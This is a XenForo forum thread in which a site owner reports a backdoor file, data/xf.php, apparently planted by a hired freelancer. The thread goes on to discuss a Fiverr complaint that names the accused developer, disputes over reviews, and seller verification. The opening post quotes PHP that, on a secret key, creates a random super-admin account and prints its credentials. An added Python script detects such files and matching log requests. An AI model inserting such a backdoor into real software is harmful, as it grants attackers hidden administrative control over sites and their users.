XF 2.2 xenforo developer may have added an exploit file

MR X

Active member
So I hired a dev on Fiverr to make me an addon. It took way too long to complete by the time frame, so I fired him, then some time later re-hired him to actually finish it. Garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php. This is not an official XenForo file, is it? Because within it is:

PHP:
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

That is just the gist of what all was in it.

Appreciate some support, thank you.
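As an added defender's example (not code from this thread, from XenForo, or from any of the people in it): XenForo's data/ and internal_data/ directories hold attachments, avatars and caches, never executable PHP, so a .php file there is the kind of thing the OP found. The script below walks those directories for PHP files and then scans Apache combined-format access log lines for requests to such files, reporting source IPs that also touched admin.php. The directory tree and the log lines are constructed for the demo; the query-string value is a placeholder, not the key from the post.

```python
"""Check a XenForo install for PHP files in data-only directories and
look for requests to them in Apache access logs.
Added example; the demo tree and log lines below are constructed."""
import os
import re
import tempfile

# XenForo stores uploaded/cached data here; nothing in them should be PHP.
DATA_DIRS = ("data", "internal_data")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def find_php_in_data_dirs(root):
    """Return paths (relative to root) of PHP-like files under data dirs."""
    hits = []
    for sub in DATA_DIRS:
        base = os.path.join(root, sub)
        if not os.path.isdir(base):
            continue
        for dirpath, _dirs, files in os.walk(base):
            for name in files:
                if name.lower().endswith(PHP_EXT):
                    hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


# Apache "combined" format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
DATA_PHP_RE = re.compile(r'^/(data|internal_data)/.*\.(php|phtml|php5|phar)$', re.IGNORECASE)


def requests_to_data_php(log_lines):
    """Return (ip, time, path, status) for requests to PHP files under data dirs."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop query string
        if DATA_PHP_RE.match(path):
            findings.append((m.group("ip"), m.group("time"), path, int(m.group("status"))))
    return findings


def suspect_ips(log_lines):
    """IPs that requested a PHP file under a data dir AND hit admin.php."""
    backdoor_ips = {f[0] for f in requests_to_data_php(log_lines)}
    admin_ips = set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("path").split("?", 1)[0] == "/admin.php":
            admin_ips.add(m.group("ip"))
    return sorted(backdoor_ips & admin_ips)


def build_demo_tree():
    """Constructed XenForo-like tree with one stray PHP file under data/."""
    root = tempfile.mkdtemp(prefix="xf-demo-")
    os.makedirs(os.path.join(root, "data", "attachments", "0"))
    os.makedirs(os.path.join(root, "internal_data", "code_cache"))
    open(os.path.join(root, "data", "attachments", "0", "12-abc.data"), "w").close()
    with open(os.path.join(root, "data", "xf.php"), "w") as fh:
        fh.write("<?php // placeholder standing in for the dropped file\n")
    open(os.path.join(root, "index.php"), "w").close()  # legitimate root file
    return root


# Constructed log lines (documentation-range IPs, placeholder key value).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2024:12:01:15 +0000] "GET /data/xf.php?key=PLACEHOLDER HTTP/1.1" 200 24 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Sep/2024:12:01:16 +0000] "GET /index.php?threads/hello.1/ HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Sep/2024:12:03:40 +0000] "POST /admin.php?login/login HTTP/1.1" 303 0 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Sep/2024:12:04:02 +0000] "GET /data/attachments/0/12-abc.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    root = build_demo_tree()
    print("PHP files under data dirs:", find_php_in_data_dirs(root))
    for ip, when, path, status in requests_to_data_php(SAMPLE_LOG):
        print(f"{when} {ip} -> {path} ({status})")
    print("IPs that hit a data/ PHP file and admin.php:", suspect_ips(SAMPLE_LOG))
```

Point the first function at the real web root and feed the second the real access_log; a 200 response to a PHP file under data/ followed by admin.php activity from the same address is the sequence worth pulling session and user-creation records for.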
 
Is it your common practice to pay people (with free software, etc.) to post positive reviews on xenforo.com?
The OP left a review for the small job that ForumSolution completed. The review was provided once the client was satisfied, just as ForumSolution mentioned.

I have also worked with forumsolution before, and I wrote my positive review of my own free will.
 
Let me explain the logic: we made a deal here on XenForo. I did some small work for him, of course paid; he was happy, so then he gave me a review just like a normal client. I never forced him to write a review—why would I? I have no account on fiverr lol
My words came off wrong.

forumsolution is not the same user and did not force me; xenbulletins (the bad actor) is the one that forced me to make a review.
 
Why don't you write a negative review on Fiverr explaining what he did and, most importantly, report him to Fiverr?
He's done something very serious and will do it to everyone! Both new and, especially, existing buyers need to be warned.
I did. I am waiting for the verdict before I make a review on it (if he doesn't get banned).
 
This is what an escalated support ticket staff member said:


Thank you for providing all the detailed evidence and for your continued patience as we work through this matter.

I’m Bo from Fiverr Customer Support, and I want to assure you that we take this situation very seriously. First, I’d like to acknowledge the frustration and concern this issue has caused, especially given the serious nature of the breach you’ve outlined.

From the information you’ve shared, it’s clear that the file found on your server (/data/xf.php) was a deliberate malicious backdoor, which is in violation of Fiverr's terms and compromises the trust clients place in our platform. The evidence, including the Apache logs, chat logs, and the malicious code, strongly suggests that this freelancer, Fahad Ashraf (also known as XenAddons and xenbulletins), is directly responsible for placing the backdoor and engaging in malicious behavior.

We will be closely reviewing the details you've provided, including the information about Fahad's previous ban from the XenForo marketplace, complaints from other clients, and the false claims regarding his identity. It's deeply concerning that he encouraged off-platform payments and misrepresented himself, which clearly violates Fiverr’s policies.

I want to assure you that we are investigating this thoroughly and will take appropriate action if we find violations of Fiverr's Terms of Service. This includes possible penalties for the freelancer and steps to ensure that no other Fiverr clients are exposed to similar risks in the future. Rest assured, this is a high-priority case, and we will escalate this to the relevant teams for further review.

As for your refund request, I do understand the circumstances here, but given that the order was marked as completed in September 2024, the typical cancellation policy may not apply. However, I will forward your request to the relevant team for further consideration and to determine if any exceptions can be made in this specific case.

In the meantime, please feel free to provide any additional information or clarification, and we will continue to support you as we move forward with this investigation.

Thank you again for bringing this matter to our attention. We are committed to ensuring the safety and integrity of Fiverr’s platform, and your feedback is invaluable in helping us maintain that standard.

Best regards,
 
My words came off wrong.

forumsolution is not the same user and did not force me; xenbulletins (the bad actor) is the one that forced me to make a review.
Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway, seems like you do very little/no research on who you get to develop, so it shouldn't be a surprise they create scripts to grant themselves admin access via backdoors.
 
Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway, seems like you do very little/no research on who you get to develop, so it shouldn't be a surprise they create scripts to grant themselves admin access via backdoors.
Because you pushed ForumSolutions into this situation and tried to confuse the OP, haha
 
Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway, seems like you do very little/no research on who you get to develop, so it shouldn't be a surprise they create scripts to grant themselves admin access via backdoors.
Honestly, I had been awake for way too long when I deleted it; I thought it was xenbulletins. I'll restore it when I can recall what I put.
 
Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway, seems like you do very little/no research on who you get to develop, so it shouldn't be a surprise they create scripts to grant themselves admin access via backdoors.
Because you pushed ForumSolutions into this situation and tried to confuse the OP, haha
Found the review, I'll re-add it :D

I recently hired ForumSolutions through Fiverr for a highly customized Xenforo project, and I’m thrilled with the results. My goal was to create a "Latest Updates" page that would elevate user interaction and content visibility within the forum. This involved not only displaying threads that had been updated but also integrating several key features like thread tags, thread images, and ratings, along with a fully customizable user style display.


What really sets this project apart is the attention to detail and flexibility in user customization. ForumSolutions ensured that users could personalize their own "Latest Updates" style, allowing them to have control over how they view updated content. Whether it’s the layout, color scheme, or style, users can now tweak it to fit their preferences, making the experience much more dynamic and tailored.


Throughout the project, ForumSolutions was highly professional, communicative, and delivered the features exactly as outlined. The customization options, combined with a sleek and modern design, have greatly improved the functionality and aesthetics of the forum. I’m beyond satisfied with how everything turned out, and their ability to meet the requirements and make it all work seamlessly within Xenforo.


I highly recommend ForumSolutions for any Xenforo customization work. If you’re looking for someone who is attentive to your needs and delivers high-quality results, ForumSolutions is definitely the right choice.
 
Found the review, I'll re-add it :D

I recently hired ForumSolutions through Fiverr for a highly customized Xenforo project, and I’m thrilled with the results. My goal was to create a "Latest Updates" page that would elevate user interaction and content visibility within the forum. This involved not only displaying threads that had been updated but also integrating several key features like thread tags, thread images, and ratings, along with a fully customizable user style display.


What really sets this project apart is the attention to detail and flexibility in user customization. ForumSolutions ensured that users could personalize their own "Latest Updates" style, allowing them to have control over how they view updated content. Whether it’s the layout, color scheme, or style, users can now tweak it to fit their preferences, making the experience much more dynamic and tailored.


Throughout the project, ForumSolutions was highly professional, communicative, and delivered the features exactly as outlined. The customization options, combined with a sleek and modern design, have greatly improved the functionality and aesthetics of the forum. I’m beyond satisfied with how everything turned out, and their ability to meet the requirements and make it all work seamlessly within Xenforo.


I highly recommend ForumSolutions for any Xenforo customization work. If you’re looking for someone who is attentive to your needs and delivers high-quality results, ForumSolutions is definitely the right choice.
LMAO, you mentioned Fiverr in the review, but I'm not even on Fiverr. We made the deal here. Please correct it, and honestly, I think you need some rest to recharge yourself first.
 
This is what an escalated support ticket staff member said:


Thank you for providing all the detailed evidence and for your continued patience as we work through this matter.

I’m Bo from Fiverr Customer Support, and I want to assure you that we take this situation very seriously. First, I’d like to acknowledge the frustration and concern this issue has caused, especially given the serious nature of the breach you’ve outlined.

From the information you’ve shared, it’s clear that the file found on your server (/data/xf.php) was a deliberate malicious backdoor, which is in violation of Fiverr's terms and compromises the trust clients place in our platform. The evidence, including the Apache logs, chat logs, and the malicious code, strongly suggests that this freelancer, Fahad Ashraf (also known as XenAddons and xenbulletins), is directly responsible for placing the backdoor and engaging in malicious behavior.

We will be closely reviewing the details you've provided, including the information about Fahad's previous ban from the XenForo marketplace, complaints from other clients, and the false claims regarding his identity. It's deeply concerning that he encouraged off-platform payments and misrepresented himself, which clearly violates Fiverr’s policies.

I want to assure you that we are investigating this thoroughly and will take appropriate action if we find violations of Fiverr's Terms of Service. This includes possible penalties for the freelancer and steps to ensure that no other Fiverr clients are exposed to similar risks in the future. Rest assured, this is a high-priority case, and we will escalate this to the relevant teams for further review.

As for your refund request, I do understand the circumstances here, but given that the order was marked as completed in September 2024, the typical cancellation policy may not apply. However, I will forward your request to the relevant team for further consideration and to determine if any exceptions can be made in this specific case.

In the meantime, please feel free to provide any additional information or clarification, and we will continue to support you as we move forward with this investigation.

Thank you again for bringing this matter to our attention. We are committed to ensuring the safety and integrity of Fiverr’s platform, and your feedback is invaluable in helping us maintain that standard.

Best regards,
Given the nature of marketplaces like Fiverr this will probably mean: they will simply ban him from the platform and that's all. They know that they are a low-end marketplace, largely based on discount pricing by those who offer services there. The cheap prices are why customers go there in the first place, and whoever has the choice as a service provider will probably not offer on Fiverr but stay away. As a consequence you find loads of low-quality offerings - it is a marketplace for desperate sellers and one for sellers from developing countries that can somewhat still make a living from the low prices. Basically, marketplaces like that in my eyes are in fact in wider parts digital colonialism and the equivalent of a street where day-laborers wait and hope to be picked up by someone with a truck that has work to do. Just that here the "digital street" demands its share from the worker's income. As there are loads of workers, a single certain one is not important at all and will be removed from the system in case anything does not flow well (whatever it may be).

The long letter above seems a very plush wording for: we will remove him from the platform. Especially as they only refer to "in future" while it is obvious that clients from the past probably do suffer from a real threat as well.

Which is - as an outcome - no doubt good, especially in this case (though in my eyes not enough). But looking at the whole picture it should also be a big red warning sign for anyone planning to use platforms like Fiverr. Especially regarding work like programming or systems administration - so anything that opens up digital systems and creates the possibility for massive long-term damage. These platforms work on the cheap and they need loads of offerings - thus they will probably not care too much beforehand about the qualifications of those that provide services. In case of trouble or complaints of any kind (or possibly even just an average review score below a certain level) they probably simply remove that seller (be it justified or not). Simply the most cost-effective way to run such a platform, so this is probably the way they act.
 
Given the nature of marketplaces like Fiverr this will probably mean: they will simply ban him from the platform and that's all. They know that they are a low-end marketplace, largely based on discount pricing by those who offer services there. The cheap prices are why customers go there in the first place, and whoever has the choice as a service provider will probably not offer on Fiverr but stay away. As a consequence you find loads of low-quality offerings - it is a marketplace for desperate sellers and one for sellers from developing countries that can somewhat still make a living from the low prices. Basically, marketplaces like that in my eyes are in fact in wider parts digital colonialism and the equivalent of a street where day-laborers wait and hope to be picked up by someone with a truck that has work to do. Just that here the "digital street" demands its share from the worker's income. As there are loads of workers, a single certain one is not important at all and will be removed from the system in case anything does not flow well (whatever it may be).

The long letter above seems a very plush wording for: we will remove him from the platform. Especially as they only refer to "in future" while it is obvious that clients from the past probably do suffer from a real threat as well.

Which is - as an outcome - no doubt good, especially in this case (though in my eyes not enough). But looking at the whole picture it should also be a big red warning sign for anyone planning to use platforms like Fiverr. Especially regarding work like programming or systems administration - so anything that opens up digital systems and creates the possibility for massive long-term damage. These platforms work on the cheap and they need loads of offerings - thus they will probably not care too much beforehand about the qualifications of those that provide services. In case of trouble or complaints of any kind (or possibly even just an average review score below a certain level) they probably simply remove that seller (be it justified or not). Simply the most cost-effective way to run such a platform, so this is probably the way they act.
I completely agree with your take. Fiverr is mostly about cheap labor and volume, not real quality or accountability. The whole system is designed for quick, low-cost work, which naturally attracts desperate sellers and careless buyers. For serious projects like a highly customised addon, trusting such a marketplace is a huge risk. Your comparison to digital colonialism is very accurate — it's built on squeezing workers while offering very little security or professionalism in return.
 
careless buyers
Possibly "careless" is founded on something different: being clueless in the sense of unqualified. They do not know what to care for, they have no clue about the prices of custom software development, they have no clue about the patterns of quality software development, they do not understand the systems they are running (in terms of technical complexity or risk), they do not know where to find a qualified seller (or how to identify one at all) and they lack the financial resources to afford a high-quality offering (while sometimes simply being greedy). They basically often understand neither the market nor the product they want to buy.

Unfortunately, this is in my eyes to a degree true for this forum here as well: there seems to be a certain percentage of people running forums that lack the qualifications to do that in a responsible manner. It is easy to set up a forum, not so easy to run it long term in a safe and responsible way. Especially if you want to extend or customize it in one way or another. A lot of the people that offer services here seem to come from developing countries - probably partly b/c the market for XF add-ons seems not big enough for a serious business case based on western salaries and partly b/c the buyers do lack money to pay on that level or simply are not willing to do so. Still, it could be a win-win-win situation for all parties involved: sellers, buyers and XF as a platform.

XF tries to keep the offerings in this forum clean, but in fact one often has no clue whom one is buying from, what qualifications they may have or lack and what quality level their work has. Which is in my eyes a huge problem.

Basically, in most cases, one buys an add-on or service from an anonymous nickname w/o even knowing the country the person resides in or the real name, and does not have the abilities anyway to judge if the work has been done properly (as even if it works it can be very shady code, as has been seen countless times). So although marketplaces like Fiverr make a living from this lack of competence, the same problems do show up elsewhere as well (and not only in the XF world), including here in the forums. A high price alone is surely not a good enough indicator or metric for a good service (and a low one not for a bad service).

You are a good example of the issue yourself: some people claim you would be said Fahad, mainly b/c you showed up on this forum out of the blue, offering services, basically the minute after he got banned, and you provided a somewhat strange story regarding your background and experience and - despite a claimed year-long history in developing add-ons etc. for XF - you could not provide any references or were not willing to. Which then raised suspicions, understandably in my eyes. A lot of strange correlation, but not necessarily causality. I've absolutely no clue what is true or not and also do not care - but it is clear that situations like that are a result of the possibility (or rather standard) of offering services de facto anonymously here on the forums under a nickname w/o any verification beforehand. I don't blame XF for that too much (but a little bit) - it is a problem that is somewhat difficult to resolve, especially for a company as small as XF and in a market like the XF add-on and customizing market. Yet it is a huge problem.
 
Possibly "careless" is founded on something different: being clueless in the sense of unqualified. They do not know what to care for, they have no clue about the prices of custom software development, they have no clue about the patterns of quality software development, they do not understand the systems they are running (in terms of technical complexity or risk), they do not know where to find a qualified seller (or how to identify one at all) and they lack the financial resources to afford a high-quality offering (while sometimes simply being greedy). They basically often understand neither the market nor the product they want to buy.

Unfortunately, this is in my eyes to a degree true for this forum here as well: there seems to be a certain percentage of people running forums that lack the qualifications to do that in a responsible manner. It is easy to set up a forum, not so easy to run it long term in a safe and responsible way. Especially if you want to extend or customize it in one way or another. A lot of the people that offer services here seem to come from developing countries - probably partly b/c the market for XF add-ons seems not big enough for a serious business case based on western salaries and partly b/c the buyers do lack money to pay on that level or simply are not willing to do so. Still, it could be a win-win-win situation for all parties involved: sellers, buyers and XF as a platform.

XF tries to keep the offerings in this forum clean, but in fact one often has no clue whom one is buying from, what qualifications they may have or lack and what quality level their work has. Which is in my eyes a huge problem.

Basically, in most cases, one buys an add-on or service from an anonymous nickname w/o even knowing the country the person resides in or the real name, and does not have the abilities anyway to judge if the work has been done properly (as even if it works it can be very shady code, as has been seen countless times). So although marketplaces like Fiverr make a living from this lack of competence, the same problems do show up elsewhere as well (and not only in the XF world), including here in the forums. A high price alone is surely not a good enough indicator or metric for a good service (and a low one not for a bad service).

You are a good example of the issue yourself: some people claim you would be said Fahad, mainly b/c you showed up on this forum out of the blue, offering services, basically the minute after he got banned, and you provided a somewhat strange story regarding your background and experience and - despite a claimed year-long history in developing add-ons etc. for XF - you could not provide any references or were not willing to. Which then raised suspicions, understandably in my eyes. A lot of strange correlation, but not necessarily causality. I've absolutely no clue what is true or not and also do not care - but it is clear that situations like that are a result of the possibility (or rather standard) of offering services de facto anonymously here on the forums under a nickname w/o any verification beforehand. I don't blame XF for that too much (but a little bit) - it is a problem that is somewhat difficult to resolve, especially for a company as small as XF and in a market like the XF add-on and customizing market. Yet it is a huge problem.
So much to say, so little give.
 
You are a good example of the issue yourself: some people claim you would be said Fahad, mainly b/c you showed up on this forum out of the blue, offering services, basically the minute after he got banned, and you provided a somewhat strange story regarding your background and experience and - despite a claimed year-long history in developing add-ons etc. for XF - you could not provide any references or were not willing to. Which then raised suspicions, understandably in my eyes. A lot of strange correlation, but not necessarily causality. I've absolutely no clue what is true or not and also do not care - but it is clear that situations like that are a result of the possibility (or rather standard) of offering services de facto anonymously here on the forums under a nickname w/o any verification beforehand. I don't blame XF for that too much (but a little bit) - it is a problem that is somewhat difficult to resolve, especially for a company as small as XF and in a market like the XF add-on and customizing market. Yet it is a huge problem.
To clarify, I understand the concern—my arrival here simply coincided with that period; it was unfortunate timing on my part. Previously, I couldn’t share a portfolio because I was employed by a company that also provides XenForo services, and my contracts/NDAs prohibit presenting that work as my own. I held back to remain compliant, and I acknowledge I didn’t communicate that clearly at the time. Over the past three years, I’ve completed 50+ independent XenForo projects and now maintain my own portfolio.
 
To clarify, (...) Over the past three years, I’ve completed 50+ independent XenForo projects and now maintain my own portfolio.
To clarify: I had and have no intention to badmouth you - I have no reason and no foundation to do so and we have never been in touch by any means. The story was just meant as an example of what the results of a lack of transparency are, even here on the forums.

If, e.g., there were a label "verified seller / service provider" which simply would mean "We (XF) have checked the identity of the seller and know who he is", even w/o telling anything about the actual quality or warranting anything, things would already improve. I totally understand why they don't do it - but as a result sometimes there are wild accusations w/o real foundation on the one hand and sometimes fooled customers on the other. So basically lose-lose instead of win-win sometimes.
 
To clarify: I had and have no intention to badmouth you - I have no reason and no foundation to do so and we have never been in touch by any means. The story was just meant as an example of what the results of a lack of transparency are, even here on the forums.

If, e.g., there were a label "verified seller / service provider" which simply would mean "We (XF) have checked the identity of the seller and know who he is", even w/o telling anything about the actual quality or warranting anything, things would already improve. I totally understand why they don't do it - but as a result sometimes there are wild accusations w/o real foundation on the one hand and sometimes fooled customers on the other. So basically lose-lose instead of win-win sometimes.
Thanks for clarifying—understood, and no hard feelings. I agree the real issue is the transparency gap: it invites speculation and occasionally hurts buyers and sellers. If XenForo offers an opt-in "Verified Provider" badge, I'd support it—and I also understand why they don't do it.
 